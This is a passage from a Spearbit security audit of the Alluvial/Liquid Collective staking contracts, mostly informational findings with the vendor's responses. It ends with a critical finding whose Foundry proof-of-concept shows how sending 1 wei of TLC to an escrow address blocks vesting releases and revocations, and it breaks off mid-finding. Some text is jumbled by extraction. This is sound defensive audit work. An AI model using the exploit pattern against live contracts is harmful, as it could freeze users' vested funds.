operator index. Alluvial: Issue does not exist anymore given that the referenced code has been removed in SPEARBIT/14. Spearbit: Acknowledged. +6.6.14 Inline the known value of the boolean opExists with its value. Severity: Informational Context: Operators.sol#L261-L270 Description/Recommendation: In the else branch on Line 269 we know opExists == true. So we can simplify the lines 268-269 a bit: if (!newValue.active) { _setOperatorIndex(name, false, index); Alluvial: Issue does not exist anymore given that the referenced code has been removed in SPEARBIT/14. Spearbit: Acknowledged. +6.6.15 The expression for selectedOperatorAvailableKeys in OperatorsRegistry can be simplified. Severity: Informational Context: OperatorsRegistry.1.sol#L428-L430 to opera- Description: tors[selectedOperatorIndex].keys. Since the places that the limit has been set with a value other than 0 has checks against going above keys bound: operators[selectedOperatorIndex].limit is always less than or equal OperatorsRegistry.1.sol#L250-L252 if (_newLimits[idx] > operator.keys) { revert OperatorLimitTooHigh(_newLimits[idx], operator.keys); } OperatorsRegistry.1.sol#L324-L326 if (keyIndex >= operator.keys) { revert InvalidIndexOutOfBounds(); } OperatorsRegistry.1.sol#L344-L346 52 if (_indexes[_indexes.length - 1] < operator.limit) { operator.limit = _indexes[_indexes.length - 1]; } Recommendation: The usage of theUint256Lib.min utility function is not necessary and the value of selected- OperatorAvailableKeys can be computed as: uint256 selectedOperatorAvailableKeys = ( operators[selectedOperatorIndex].limit - operators[selectedOperatorIndex].funded ); Spearbit: It is kind of implemented. Although the minimizer/cost function has been modified in SPEARBIT/3. +6.6.16 The unused constant DELTA_BASE can be removed Severity: Informational Context: BeaconReportBounds.sol#L11 Description: The constant DELTA_BASE in BeaconReportBounds is never used. Recommendation: If you are not planning to use it, it would be best to remove it from the codebase. Alluvial: Recommendation implemented in SPEARBIT/30. Note: We changed the name of BeaconReportBounds to ReportBounds. Spearbit: Acknowledged. +6.6.17 Remove unused modifiers Severity: Informational Context: OperatorsRegistry.1.sol#L115 Description: The modifier active(uint256 _index) is not used in the project. Recommendation: If you are not planning to use this modifier, consider removing it from the codebase. Alluvial: Recommendation implemented in SPEARBIT/30. Spearbit: Acknowledged. +6.6.18 Modifier names do not follow the same naming patterns Severity: Informational Context: OperatorsRegistry.1.sol#L45, OperatorsRegistry.1.sol#L62 Description: The modifier names do not follow the same naming patterns in OperatorsRegistry. Recommendation: Consider renaming the following modifiers: modifier operatorFeeRecipientOrAdmin(uint256 _index) modifier operatorOrAdmin(uint256 _index) To be consistent with other modifier names, it might be best to call operatorFeeRecipientOrAdmin onlyAc- tiveOperatorFeeRecipientOrAdmin (and its input could be called _operatorIndex). And also we can rename operatorOrAdmin to onlyActiveOperatorOrAdmin (and its input could be called _operatorIndex). Alluvial: Recommendation implemented in SPEARBIT/30. Spearbit: Acknowledged. 53 +6.6.19 In AllowlistV1.allow the input variable _statuses can be renamed to better represent that values it holds Severity: Informational Context: Allowlist.1.sol#L49 Description: In AllowlistV1.allow the input variable _statuses can be renamed to better represent the values it holds. _statuses is a bitmap where each bit represents a particular action that a user can take. Recommendation: Rename _statuses to better represent what it is used for. Basically, each status here is representing 256 permission roles. Maybe rename it to _userPermissions to relate to the use cases in the other functions in AllowlistV1. Alluvial: Changed _statuses to _permissions in SPEARBIT/30. Spearbit: Acknowledged. +6.6.20 riverAddress can be renamed to river and we can avoid extra interface casting Severity: Informational Context: Oracle.1.sol#L468-L471, Oracle.1.sol#L479 Description: riverAddress's name suggest that it is only an address. Although it is an address with the IRiverV1 attached to it. Also, we can avoid unnecessary casting of interfaces. Recommendation: riverAddress can be renamed to river, since it's not just an address as the name suggest. Also, the extra interface castings can be removed. IRiverV1 river = IRiverV1(payable(RiverAddress.get())); uint256 prevTotalEth = river.totalUnderlyingSupply(); river.setBeaconData(_validatorCount, _balanceSum, bytes32(_epochId)); uint256 postTotalEth = river.totalUnderlyingSupply(); ... emit PostTotalShares( postTotalEth, prevTotalEth, timeElapsed, river.totalSupply() ); Alluvial: Recommendation implemented in SPEARBIT/30. Spearbit: Acknowledged. +6.6.21 Define named constants for numeric literals Severity: Informational Context: Oracle.1.sol#L436, Oracle.1.sol#L447 Description: In _sanitychecks there 2 numeric literals 10000 and 365 days used: uint256(10000 * 365 days) * (_postTotalEth - _prevTotalEth) ... if (uint256(10000) * (_prevTotalEth - _postTotalEth) > relativeLowerBound * _prevTotalEth) { Recommendation: It would be best to define and replace those with named constants. Alluvial: Recommendation implemented in SPEARBIT/19. Spearbit: Acknowledged. 54 +6.6.22 Move memberIndex and ReportsPositions checks at the beginning of the OracleV1.reportBeacon function. Severity: Informational Context: Oracle.1.sol#L289, Oracle.1.sol#L307-L313 Description: The checks for memberIndex == -1 and ReportsPositions.get(uint256(memberIndex)) happen in the middle of reportBeacon after quite a few calculations are done. Recommendation: Move these checks to the beginning of the function to revert early if it would ever have to revert because of these 2 checks. function reportBeacon(uint256 _epochId, uint64 _beaconBalance, uint32 _beaconValidators) external { int256 memberIndex = OracleMembers.indexOf(msg.sender); if (memberIndex == -1) { revert Errors.Unauthorized(msg.sender); } ... if (ReportsPositions.get(uint256(memberIndex))) { revert AlreadyReported(_epochId, msg.sender); } ... Alluvial: Recommendation implemented in SPEARBIT/20. Spearbit: Acknowledged. +6.6.23 Document what incentivizes the operators to run their validators when globalFee is zero Severity: Informational Context: River.1.sol#L270 Description: If GlobalFee could be 0, then neither the treasury nor the operators earn rewards. What factor would motivate the operators to keep their validators running? Recommendation: It would be best to document if there are other incentives for the operators to keep their validators running when globalFee is zero. Alluvial: Acknowledged. +6.6.24 Document how Alluvial plans to prevent institutional investors and operators get into business directly and bypass using the River protocol. Severity: Informational Description: Since the list of operators and also depositors can be looked up from the information on-chain, what would prevent Institutional investors (users) and the operators to do business outside of River? Is there going to be an off-chain legal contract between Alluvial and these other entities to prevent this scenario? Recommendation: Document how Alluvial plans to prevent institutional investors and operators get into business directly and bypass using the River protocol. Alluvial: Acknowledged. 55 +6.6.25 Document how operator rewards will be distributed if OperatorRewardsShare is zero Severity: Informational Context: River.1.sol#L275 Description: If OperatorRewardsShare could be 0, then the operators won't earn rewards. What factor would motivate the operators to keep their validators running? Sidenote: Other incentives for the operators to keep their validators running (if their reward share portion is 0) would be some sort of MEV or block proposal/attestation bribes. Related: Avoid to waste gas distributing rewards when the number of shares to be distributed is zero Recommendation: It would be best to document this issue for the operators so they would know how they can access the rewards. Alluvial: The whole operator rewarding system has been removed in SPEARBIT/8. The revenue redistribution would be computed off-chain and will be detailed in the documentation PR. Spearbit: Acknowledged. +6.6.26 Current operator reward distribution does not favor more performant operators Severity: Informational Context: River.1.sol#L238 Description: Reward shares are distributed based on the fraction of the active funded non-stopped validators owned by an operator. This distribution of shares does not promote the honest operation of validators to the fullest extent. Since the oracle members don't report the delta in the balance of each validator, it is not possible to reward operators/validators that have been performing better than the rest. Also if a high-performing operator or operators were the main source of the beacon balance sum and if they had enough ETH to initially deposit into the ETH2.0 deposit contract on their own, they could have made more profit that way versus joining as an operator in the River protocol. Recommendation: Oracle members can report more information per voting frame. For example, they can report the delta of balances during a voting frame per all validators of an operator. Then River can incorporate these specialized deltas in the reward distribution share minting process. Alluvial: Tracking the delta in performance on validators is too complex to achieve on-chain + the revenue delta between excellent and good operators is not massive. So the hassle to track all that on-chain is too big and it could be resolved by off-chain monitoring and discussions with operators. Also I don't get the point of operators that could directly deposit because they're not the ones bringing the funds in the system, they are simply paid to run validators on behalf of the system, and the goal of the system is to transparently expose the list of operators and their validators so anyone can audit the performance or the oracle reports. Spearbit: It's kind of a cost/reward analysis that depends on the overall earnings, GlobalFee, and OperatorRe- wardsShare. The operators who run the validators which may not have the funds to stake have at least 2 options: • Join River protocol so others would pay for staking 32 ETH and earn rewards based on the parameters above. • Take loans (with some interest rates I assume) to fully or partially fund their validators and earn interests and eventually payout those loans. • Join other liquid staking protocols with a different set of parameters. Has Alluvial analyzed/compared scenarios like the above to come up with parameters that would attract potential operators into joining their system? Alluvial: The whole operator rewarding system has been removed in SPEARBIT/8. 56 +6.6.27 TRANSFER_MASK == 0 which causes a no-op. Severity: Informational Context: Allowlist.1.sol#L96, Allowlist.1.sol#L110 River.1.sol#L36-L37, River.1.sol#L189-L190, River.1.sol#L198-L204, Allowlist.1.sol#L82, Description: TRANSFER_MASK is a named constant defined as 0 (River.1.sol#L37). Like the other masks DEPOSIT_- MASK and DENY_MASK which supposed to represent a bitmask, on the first look, you would think TRANSFER_MASK would need to also represent a bitmask. But if you take a look at _onTransfer: function _onTransfer(address _from, address _to) internal view override { IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_from, TRANSFER_MASK); // this call reverts if unauthorized or denied IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_to, TRANSFER_MASK); // this call reverts if unauthorized or denied ,! ,! } This would translate into calling onlyAllowed with the: IAllowlistV1(AllowlistAddress.get()).onlyAllowed(x, 0); Now if we look at the onlyAllowed function with these parameters: function onlyAllowed(x, 0) external view { uint256 userPermissions = Allowlist.get(x); if (userPermissions & DENY_MASK == DENY_MASK) { revert Denied(_account); } if (userPermissions & 0 != 0) { // <--- ( x & 0 != 0 ) == false revert Unauthorized(_account); } } Thus if the _from, _to addresses don't have their DENY_MASK set to 1 they would not trigger a revert since we would never step into the 2nd if block above when TRANSFER_MASK is passed to these functions. The TRANSFER_MASK is also used in _onDeposit: IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_depositor, DEPOSIT_MASK + TRANSFER_MASK); // DEPOSIT_MASK + TRANSFER_MASK == DEPOSIT_MASK ,! IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_recipient, TRANSFER_MASK); // like above in ,! `_onTransfer` Recommendation: At first, we thought TRANSFER_MASK was not assigned the correct bitmask value. So we rec- ommended setting those values correctly. But after discussing with the Alluvial team, it became clear that they are not planning to use this parameter currently and that is why it is assigned a no-op type of value. Alluvial: They have been asked to leave it so they can change its value if they ever need that feature (imo won't ever happen else the project becomes unusable) Spearbit: If TRANSFER_MASK is not being used, it would be best to remove it from the project including all the code that relies on it. Right now, the only thing that it does is a no-op. Also, if its value ever needed to be changed the whole contract would need to be redeployed (since it's a constant). So in this case, I would change the above lines in _onTransfer to: 57 IAllowlistV1 allowList = IAllowlistV1(AllowlistAddress.get()); if( allowList.isDenied(_from) ) { // Denied custom error needs to be imported or created or // we can create a new function for IAllowlist called `onlyNotDenied` to // replace this whole `if` block revert Denied(_from); } if( allowList.isDenied(_to) ) { revert Denied(_to); } and in _onDeposit to: IAllowlistV1 allowList = IAllowlistV1(AllowlistAddress.get()); allowList.onlyAllowed(_depositor, DEPOSIT_MASK); if( allowList.isDenied(_recipient) ) { revert Denied(_recipient); } Alluvial: Recommendation implemented in SPEARBIT/21. Spearbit: Acknowledged. +6.6.28 Reformat numeric literals with many digits for better readability. Severity: Informational Context: River.1.sol#L35, Oracle.1.sol#L436, Oracle.1.sol#L447, ConsensusLayerDepositManager.1.sol#L107 Description: Reformat numeric literals with many digits into a more readable form. Recommendation: Use _ or scientific notation to either partition the digits or shorten the form. River.1.sol#L35 - uint256 public constant BASE = 100000; + uint256 public constant BASE = 100_000; // or 1e5 Oracle.1.sol#L436, Oracle.1.sol#L447 - 10000 + 100_00 // or 1e4 ConsensusLayerDepositManager.1.sol#L107 - uint256 depositAmount = value / 1000000000 wei; + uint256 depositAmount = value / 1 gwei; // or 1e9 wei or 1_000_000_000 wei Alluvial: Recommendation implemented in SPEARBIT/19. Spearbit: Acknowledged. 58 +6.6.29 Firewall should follow the two-step approach present in River when transferring govern address Severity: Informational Context: Firewall.sol#L59-L61 Description: Both River and OperatorsRegistry follow a two-step approach to transfer the ownership of the contract. 1) Propose a new owner storing the address in a pendingAdmin variable 2) The pending admins accept the new role by actively calling acceptOwnership This approach makes this crucial action much safer because 1) Prevent the admin to transfer ownership to address(0) given that address(0) cannot call acceptOwnership 2) Prevent the admin to transfer ownership to an address that cannot "admin" the contract if they cannot call acceptOwnership. For example, a contract do not have the implementation to at least call acceptOwnership. 3) Allow the current admin to stop the process by calling transferOwnership(address(0)) if the pending admin has not called acceptOwnership yet The current implementation does not follow this safe approach, allowing the governor to directly transfer the gov- ernor role to a new address. Recommendation: Consider implementing a two-step approach transfer of the governor role, similarly imple- mented in the River and OperatorsRegistry contracts. Alluvial: Recommendation implemented in SPEARBIT/11. Spearbit: Note(1); Still missing (client said it will be implemented in other PRs) • Administrable miss all natspec comments. • Event for _setAdmin are still missing but will be added to Initializable event in another PR. Note(2); Client has acknowledged that all the contracts that inherit from Administrable have the ability to transfer ownership, even contracts like AllowlistV1 that didn't have the ability before this PR. Alluvial: Issues in Note 1 addressed in SPEARBIT/33. Spearbit: Acknowledged. +6.6.30 OperatorRegistry.removeValidators is resetting the limit (approved validators) even when not needed Severity: Informational Context: OperatorsRegistry.1.sol#L304-L347 Description: The current implementation of removeValidators allow an admin or node operator to remove val- idators, passing to the function the list of validator's index to be removed. Note that the list of indexes must be ordered DESC. At the end of the function, we can see these checks if (_indexes[_indexes.length - 1] < operator.limit) { operator.limit = _indexes[_indexes.length - 1]; } That reset the operator's limit to the lower index value (this to prevent that a not approved key get swapped to a position inside the limit). The issue with this implementation is that it is not considering the case where all the operator's validators are already approved by Alluvial. In this case, if an operator removes the validator with the lower index, all the other validators get de-approved because the limit will be set to the lower limit. Consider this scenario: 59 op.limit = 10 op.keys = 10 op.funded = 0 This mean that all the validators added by the operator have been approved by Alluvial and are safe (keys == limit). If the operator or Alluvial call removeValidators([validatorIndex], [0]) removing the validator at index 0 this will • swap the validator_10 with validator_0. • set the limit to 0 because 0 < 10 (_indexes[_indexes.length - 1] < operator.limit). The consequence is that even if all the validators present before calling removeValidators were "safe" (because approved by Alluvial) the limit is now 0 meaning that all the validators are not "safe" anymore and cannot be selected by pickNextValidators. Recommendation: Consider updating the logic of removeValidators to handle this edge case. Alluvial: Recommendation implemented in SPEARBIT/22. Spearbit: Acknowledged. +6.6.31 Consider renaming transferOwnership to better reflect the function's logic Severity: Informational Context: River.1.sol#L142-L146, OperatorsRegistry.1.sol#L88-L92 Description: The current implementation of transferOwnership is not really transferring the ownership from the current admin to the new one. The function is setting the value of the Pending Admin that must subsequently call acceptOwnership to accept the role and confirm the transfer of the ownership. Recommendation: Consider renaming the transferOwnership function name to something that better reflects the function logic. Alluvial: Recommendation implemented in SPEARBIT/11. Spearbit: Acknowledged. +6.6.32 Wrong return name used Severity: Informational Context: Uint256Lib.sol#L20 Description: The min function returns the minimum of the 2 inputs, but the return name used is max. Recommendation: Rename or remove return variable name. -function min(uint256 a, uint256 b) internal pure returns (uint256 max) { +function min(uint256 a, uint256 b) internal pure returns (uint256) { Alluvial: Recommendation implemented in SPEARBIT/30. Spearbit: Acknowledged. 60 +6.6.33 Discrepancy between architecture and code Severity: Informational Context: ConsensusLayerDepositManager.1.sol#L50 Description: The architecture diagram states that admin triggers deposits on the Consensus Layer Deposit Man- ager, but the depositToConsensusLayer() function allows anyone to trigger such deposits. Recommendation: Implement necessary changes to reflect the intended functionality. Alluvial: depositToConsensusLayer() function is now protected by onlyAdmin-CDMV1 modifier in SPEARBIT/27. Spearbit: Acknowledged. +6.6.34 Consider replacing the remaining require with custom errors Severity: Informational Context: ConsensusLayerDepositManager.1.sol#L129, BytesLib.sol#L94, BytesLib.sol#L95 Description: In the vast majority of the project contracts have defined and already use Custom Errors that provide a better UX, DX and gas saving compared to require statements. There are still some instances of require usage in ConsensusLayerDepositManager and BytesLib contracts that could be replaced with custom errors. Recommendation: Consider replacing the remaining require statements with custom errors to follow the best practice already adopted by the project. Alluvial: Recommendation implemented in SPEARBIT/23. Spearbit: Acknowledged. +6.6.35 Both wlsETH and lsETH transferFrom implementation allow the owner of the token to use trans- ferFrom like if it was a "normal" transfer Severity: Informational Context: WLSETH.1.sol#L103-L109, SharesManager.1.sol#L129-L135 Description: The current implementation of transferFrom allow the msg.sender to use the function like if it was a "normal" transfer. In this case, the allowance is checked only if the msg.sender is not equal to _from if (_from != msg.sender) { uint256 currentAllowance = ApprovalsPerOwner.get(_from, msg.sender); if (currentAllowance < _value) { revert AllowanceTooLow(_from, msg.sender, currentAllowance, _value); } ApprovalsPerOwner.set(_from, msg.sender, currentAllowance - _value); } This implementation diverge from what is usually implemented in both Solmate and OpenZeppelin. Recommendation: For clarity, remove the check and allow only the msg.sender to transfer tokens from his/her balance only via the transfer function. Removing the check would also make the function cost less gas. Alluvial: Recommendation implemented in SPEARBIT/9. Spearbit: Acknowledged. 61 +6.6.36 Both wlsETH and lsETH tokens are reducing the allowance when the allowed amount is type(uint256).max Severity: Informational Context: WLSETH.1.sol#L103-L109, SharesManager.1.sol#L129-L135 Description: The current implementation of the function transferFrom in both SharesManager.1.sol and WLSETH.1.sol is not taking into consideration the scenario where a user has approved a spender the maximum possible allowance type(uint256).max. The Alluvial transferFrom acts differently from standard ERC20 implementations like the one from Solmate and OpenZeppelin. In their implementation, they check and reduce the spender allowance if and only if the allowance is different from type(uint256).max. Recommendation: Consider following the standard ERC20 implementation from Solmate or OpenZeppelin to prevent reducing an allowance that has set to infinite (type(uint256).max). Alluvial: Recommendation implemented in SPEARBIT/9. Spearbit: Acknowledged. +6.6.37 Missing, confusing or wrong natspec comments Severity: Informational Context: • Allowlist.1.sol • Firewall.sol • Initializable.sol • OperatorsRegistry.1.sol • Oracle.1.sol • River.1.sol • TUPProxy.sol • WLSETH.1.sol • Withdraw.1.sol • ConsensusLayerDepositManager.1.sol • OracleManager.1.sol • SharesManager.1.sol • UserDepositManager.1.sol • all interfaces inside the interfaces folder consider the usage of @inheritdoc • BytesLib.sol • Errors.sol • LibOwnable.sol • Uint256Lib.sol • UnstructuredStorage.sol • all the contracts/libraries inside the state folder 62 Description: In the current implementation not all the constructors, functions, events, custom errors, variables or struct are covered by natspec comments. Some of them are only partially covered (missing @param, @return and so on). Note that the contracts listed in the context section of the issue have inside of them complete or partial missing natspec. • Natspec Fixes / Typos: River.1.sol#L38-L39 Swap the empty line with the NatSpec @notice - /// @notice Prevents unauthorized calls - + + /// @notice Prevents unauthorized calls OperatorsRegistry.1.sol#L44, OperatorsRegistry.1.sol#L61, OperatorsRegistry.1.sol#L114 Replace name with index. - /// @param _index The name identifying the operator + /// @param _index The index identifying the operator OperatorsRegistry.1.sol#L218 Replace cound with count. - /// @notice Changes the operator stopped validator cound + /// @notice Changes the operator stopped validator count • Expand the natspec explanation: We also suggest expanding some function's logic inside the natspec OperatorsRegistry.1.sol#L355-L358 Expand the natspec documentation and add a @return natspec comment clarifying that the returned value is the number of total operator and not the active/fundable one. ReportsVariants.sol#L5 Add a comment that explains the COUNT_OUTMASK's assignment. This will mask beaconValidators and beacon- Balance in the designed packing. xx...xx xxxx & COUNT_OUTMASK == 00...00 0000 ReportsVariants.sol ReportsVariants should have a documentation regarding the packing used for ReportsVariants in an uint256: [ 0, 16) : oracle member's total vote count for the numbers below (uint16, 2 bytes) ,! [16, [48, 112) : 48) : total number of beacon validators (uint32, 4 bytes) total balance of all the beacon validators (uint64, 6 bytes) OracleMembers.sol Leave a comment/warning that only there could a maximum of 256 oracle members. This is due to the Report- sPosition setup where in an uint256, 1 bit is reserved for each oracle member's index. ReportsPositions.sol 63 Leave a comment/warning for the ReportsPosition setup that the ith bit in the uint256 represents whether or not there has been a beacon report by the ith oracle member. Oracle.1.sol#L202-L205 Leave a comment/warning that only there could a maximum of 256 oracle members. This is due to the Report- sPosition setup where in an uint256, 1 bit is reserved for each oracle member's index. Allowlist.1.sol#L46-L49 Leave a comment, warning that the permission bitmaps will be overwritten instead of them getting updated. OracleManager.1.sol#L44 Add more comment for _roundId to mention that when the setBeaconData is called by Oracle.1.sol:_push- ToRiver and that the value passed to it for this parameter is always the 1st epoch of a frame. OperatorsRegistry.1.sol#L304-L310 _indexes parameter, mentioning that this array: 1) needs to be duplicate-free and sorted (DESC) 2) each element in the array needs to be in a specific range, namely operator.[funded, keys). OperatorsRegistry.1.sol#L60-L62 Better rephrase the natspec comment to avoid further confusion. Oracle.1.sol#L284-L289 Update the reportBeacon natspec documentation about the _beaconValidators parameter to avoid further con- fusion. Client answer to the PR comment The docs should be updated to also reflect our plans for the Shanghai fork. Basically we can't just have the same behavior for a negative delta in validator count than with a positive delta (where we just assume that each validator that was in the queue only had 32 eth). Now when we exit validator we need to know how much was exited in order to compute the proper revenue value for the treasury and operator fee. This probably means that there will be an extra arg with the oracle to keep track of the exited eth value. But as long as the spec is not final, we'll stick to the validator count always growing. We should definitely add a custom error to explain that in case a report provides a smaller validator count. Recommendation: Consider the missing natspec to the suggested constructors, functions, events, custom errors, variables or struct. Alluvial: Addressed in [SPEARBIT/33] Documentation and natspec. Spearbit: Acknowledged. +6.6.38 Remove unused imports from code Severity: Informational Context: ELFeeRecipient.1.sol#L6, Oracle.1.sol#L9 Description: The codebase has unused imports across the code base. If they are not used inside the contract, it would be better to remove them to avoid confusion. Recommendation: Remove imports if not used by the contracts. Alluvial: Recommendation implemented in SPEARBIT/32. Spearbit: Acknowledged. 64 +6.6.39 Missing event emission in critical functions, init functions and setters Severity: Informational Context: • Allowlist.1.sol#L22 • Allowlist.1.sol#L37 • OperatorsRegistry.1.sol#L23 • OperatorsRegistry.1.sol#L84 • OperatorsRegistry.1.sol#L90 • OperatorsRegistry.1.sol#L95 • ELFeeRecipient.1.sol#L18 • Firewall.sol#L25-L30 • Firewall.sol#L59 • Firewall.sol#L64 • Firewall.sol#L69 • Oracle.1.sol#L53-L62 • Oracle.1.sol#L205 • Oracle.1.sol#L216 • Oracle.1.sol#L230 • Oracle.1.sol#L248 • River.1.sol#L57-L68 • River.1.sol#L92 • River.1.sol#L107 • River.1.sol#L122 • River.1.sol#L133 • River.1.sol#L144 • River.1.sol#L149 • River.1.sol#L169 • TUPProxy.sol#L27 • TUPProxy.sol#L32 • WLSETH.1.sol#L43 • WLSETH.1.sol#L129 • WLSETH.1.sol#L140 • OracleManager.1.sol#L77 Description: Some critical functions like contract's constructor, contract's init*(...)function (upgradable con- tracts) and some setter or in general critical functions are missing event emission. Event emissions are very useful for external web3 applications, but also for monitoring the usage and security of your protocol when paired with external monitoring tools. Note: in the init*(...)/constructor function, consider if adding a general broad event like ContractInitial- ized or split it in more specific events like QuorumUpdated+OwnerChanged+... 65 Note: in general, consider adding an event emission to all the init*(...) functions used to initialize the upgrad- able contracts, passing to the event the relevant args in addition to the version of the upgrade. Recommendation: Consider adding event emission to the contracts that are lacking them. Alluvial: Recommendation implemented in SPEARBIT/31. Spearbit: Acknowledged. 66 7 Appendix 7.1 diff --git a/findings_newupdate/spearbit/LiquidCollective2-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/LiquidCollective2-Spearbit-Security-Review.txt new file mode 100644 index 0000000..6bbf190 --- /dev/null +++ b/findings_newupdate/spearbit/LiquidCollective2-Spearbit-Security-Review.txt @@ -0,0 +1,31 @@ +7.1.1 A malicious user could DOS a vesting schedule by sending only 1 wei of TLC to the vesting escrow address Severity: Critical Risk Context: • ERC20VestableVotesUpgradeable.1.sol#L132-L134 • ERC20VestableVotesUpgradeable.1.sol#L137-L139 • ERC20VestableVotesUpgradeable.1.sol#L86-L97 • ERC20VestableVotesUpgradeable.1.sol#L353 Description: An external user who owns some TLC tokens could DOS the vesting schedule of any user by sending just 1 wei of TLC to the escrow address related to the vesting schedule. By doing that: • The creator of the vesting schedule will not be able to revoke the vesting schedule. • The beneficiary of the vesting schedule will not be able to release any vested tokens until the end of the vesting schedule. • Any external contracts or dApps will not be able to call computeVestingReleasableAmount . In practice, all the functions that internally call _computeVestingReleasableAmount will revert because of an un- derflow error when called before the vesting schedule ends. The underflow error leasableAmount will enter uint256 releasedAmount = _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) - balanceOf(_escrow); is thrown because, when called before the schedule ends, _computeVestingRe- try to compute the if (_time < _vestingSchedule.end) branch and will In this case, _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) will always be lower than balanceOf(_escrow) and the contract will revert with an underflow error. When the vesting period ends, the contract will not enter the if (_time < _vestingSchedule.end) and the user will be able to gain the whole vested amount plus the extra amount of TLC sent to the escrow account by the malicious user. Scenario: 1) Bob owns 1 TLC token. 2) Alluvial creates a vesting schedule for Alice like the following example: createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); 3) Bob sends 1 TLC token to the vesting schedule escrow account of the Alice vesting schedule. 8 4) After the cliff period, Alice should be able to release 1 TLC token. Because now balanceOf(_escrow) is 11 it will underflow as _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) returns 10. Find below a test case showing all three different DOS scenarios: //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import "forge-std/Test.sol"; import "../src/TLC.1.sol"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearVestTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr("init"); bob = makeAddr("bob"); alice = makeAddr("alice"); carl = makeAddr("carl"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testDOSReleaseVestingSchedule() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob send one token directly to the Escrow contract of alice 9 vm.prank(bob); tlc.transfer(aliceEscrow, 1); // Cliff period has passed and Alice try to get the first batch of the vested token vm.warp(block.timestamp + 1 days); vm.prank(alice); // The transaction will revert for UNDERFLOW because now the balance of the escrow has been ,! increased externally vm.expectRevert(stdError.arithmeticError); tlc.releaseVestingSchedule(0); // Warp at the vesting schedule period end vm.warp(block.timestamp + 9 days); // Alice is able to get the whole vesting schedule amount // plus the token sent by the attacker to the escrow contract vm.prank(alice); tlc.releaseVestingSchedule(0); assertEq(tlc.balanceOf(alice), 11); } function testDOSRevokeVestingSchedule() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob send one token directly to the Escrow contract of alice vm.prank(bob); tlc.transfer(aliceEscrow, 1); // The creator decide to revoke the vesting schedule before the end timestamp // It will throw an underflow error vm.prank(initAccount); vm.expectRevert(stdError.arithmeticError); tlc.revokeVestingSchedule(0, uint64(block.timestamp + 1)); } function testDOSComputeVestingReleasableAmount() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice 10 vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob send one token directly to the Escrow contract of alice vm.prank(bob); tlc.transfer(aliceEscrow, 1); vm.expectRevert(stdError.arithmeticError); uint256 releasableAmount = tlc.computeVestingReleasableAmount(0); // Warp to the end of the vesting schedule vm.warp(block.timestamp + 10 days); releasableAmount = tlc.computeVestingReleasableAmount(0); assertEq(releasableAmount, 11); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } 11 } Recommendation: Consider re-implementing how the contract accounts for the amount of released tokens of a vesting schedule to avoid this situation. In case the new implementation does not rely anymore on balanceOf(_- escrow), remember that tokens sent directly to the escrow account would be stuck forever. Alluvial: Fixed in liquid-collective/liquid-collective-protocol@7870787 by introducing a new variable inside the user vesting schedule named releasedAmount that tracks the already released amount and can not be manipulated by an external attacker. Spearbit: Fixed. 7.2 Medium Risk +7.2.1 Coverage funds might be pulled not only for the purpose of covering slashing losses Severity: Medium Risk Context: OracleManager.1.sol#L108-L113 Description: The newly introduced coverage fund is a smart contract that holds ETH to cover a potential lsETH price decrease due to unexpected slashing events. Funds might be pulled from CoverageFundV1 to the River contract through setConsensusLayerData to cover the losses and keep the share price stable In practice, however, it is possible that these funds will be pulled not only in emergency events. _maxIncrease is used as a measure to enforce the maximum difference between prevTotalEth and postTotalEth, but in practice, it is being used as a mandatory growth factor in the context of coverage funds, which might cause the pulling of funds from the coverage fund to ensure _maxIncrease of revenue in case fees are not high enough. Recommendation: Consider replacing if (((_maxIncrease + previousValidatorTotalBalance) - executionLayerFees) > _validatorTotalBalance) { coverageFunds = _pullCoverageFunds( ((_maxIncrease + previousValidatorTotalBalance) - executionLayerFees) - _validatorTotalBalance ); } with if (previousValidatorTotalBalance > _validatorTotalBalance + executionLayerFees)) { coverageFunds = _pullCoverageFunds( ((_maxIncrease + previousValidatorTotalBalance) - executionLayerFees) - _validatorTotalBalance ); } Alluvial: Trying to clarify the use-case and the sequence of operations here: • Use case: Liquid Collective partners with Nexus Mutual (NXM) and possibly other actors to cover for slashing losses. Each time Liquid Collective adds a validator key to the system, we will submit the key to NXM In case one of the validator's keys 